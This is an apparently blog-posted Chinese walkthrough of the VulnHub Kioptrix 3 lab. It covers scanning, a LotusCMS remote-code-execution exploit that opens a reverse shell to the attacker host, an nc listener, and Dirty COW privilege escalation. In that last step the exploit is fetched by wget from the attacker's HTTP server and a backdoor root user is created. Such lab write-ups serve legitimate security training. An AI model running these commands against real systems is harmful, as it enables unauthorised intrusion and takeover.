靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar
一.安装
下载完虚拟机直接打开这个文件就可以
靶机的网络设为nat确保和kali一个网段
正常启动是这样
二.信息收集
kali的ip为:192.168.231.133
kali扫描ip
arp-scan -l
确定目标主机ip为192.168.231.183
端口扫描发现开放22,80端口
nmap -p- 192.168.231.183
目录扫描
dirsearch -u http://192.168.231.183
访问80端口看看
有个login登陆界面点开试试
发现该网站用LotusCMS搭建的
三.getshell
网上寻找该cms存在的exp
发现一个python语言的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit
下载到kali后
运行脚本构造payload
python lotucms.py -rh 192.168.231.183 -rp 80 -lh 192.168.231.133
-rh 为靶机ip -rp为靶机端口 -lh为攻击机即kali的ip
kali再起一个监听,这里内置脚本是444端口不能使用其他端口
nc -lvvp 444
启动之后立刻收到监听
再变成交互式的shell
python -c 'import pty; pty.spawn("/bin/bash")'
获取到交互式shell
四.提权
使用命令uname -a
查看靶机的内核版本信息为:Linux Kioptrix3 2.6.24-24-server
使用命令cat /etc/*-release
查看靶机的发行版本信息为:Ubuntu 8.04.3 LTS
使用searchsploit查找符合内核版本和发行版本的历史漏洞
我们直接使用脏牛提权,该漏洞影响linux2.6.22 版本至 4.6 版本的所有 Linux 系统,该靶机linux内核为2.6.24符合区间。
脏牛提权
下载对应的exp到kali桌面
在kali桌面上打开命令提示符用python3起一个http服务
python3 -m http.server
在目标机上cd到tmp目录用 wget 192.168.231.133:8000/40839.c 下载exp
下载后使用命令编译
gcc -pthread 40839.c -o 40839 -lcrypt
然后 ./40839 运行
这里会让设置一个密码
设置一个后门密码,及创建的后门用户的密码
这里需要稍等一会按个回车出现命令行
查看/etc/passwd发现后门用户firefart被创建
切换用户 su firefart查看权限发现为root
成功提权
标签:kali,端口,KioptrixVM3,192.168,提权,vulnhub,ip,靶机,靶场 From: https://blog.csdn.net/2401_83378606/article/details/142316428